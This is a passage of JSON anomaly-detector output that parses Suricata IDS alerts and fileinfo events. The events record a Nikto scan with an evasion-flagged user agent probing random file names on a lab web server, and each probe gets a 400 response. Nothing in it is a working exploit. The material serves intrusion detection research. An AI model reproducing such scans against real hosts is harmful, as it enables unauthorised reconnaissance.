"/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1369948522440834,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1369948522440834, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.355425+0000\",\"flow_id\":1369948522440834,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46950,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.jsp+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.jsp+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.36 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.358195 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46952 -> 192.168.10.154:80", "/parser/model/time": 1583349514.358195, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46952, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.358195 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by 
non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46952 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.36 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.de", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.358924+0000\",\"flow_id\":583080449044546,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46952,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.de\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.de\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.358924, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":583080449044546,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": 
"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46952,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.de\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.de\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46952,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.de\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.de\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.de\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": 
",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.de\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.de", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.de", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", 
"/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46952,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46952, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":583080449044546,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 583080449044546, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ 
"{\"timestamp\":\"2020-03-04T19:18:34.358924+0000\",\"flow_id\":583080449044546,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46952,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.de\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.de\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.36 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.361389 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46954 -> 192.168.10.154:80", "/parser/model/time": 1583349514.361389, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, 
"/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46954, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.361389 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46954 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.36 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.en", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.361649+0000\",\"flow_id\":570105352846820,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46954,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.en\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.en\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.361649, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": 
"\"flow_id\":570105352846820,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46954,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.en\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.en\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46954,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.en\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.en\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.en\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, 
"/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.en\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.en", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.en", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", 
"/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46954,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46954, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":570105352846820,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 570105352846820, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ 
"{\"timestamp\":\"2020-03-04T19:18:34.361649+0000\",\"flow_id\":570105352846820,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46954,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.en\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.en\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.36 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.365743 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46956 -> 192.168.10.154:80", "/parser/model/time": 1583349514.365743, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, 
"/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46956, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.365743 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46956 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.37 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.config", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.365913+0000\",\"flow_id\":776469941489987,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46956,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.config\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.config\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.365913, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", 
"/parser/model/flow_id": "\"flow_id\":776469941489987,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46956,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.config\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.config\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46956,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.config\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.config\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.config\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", 
"/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.config\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.config", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.config", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, 
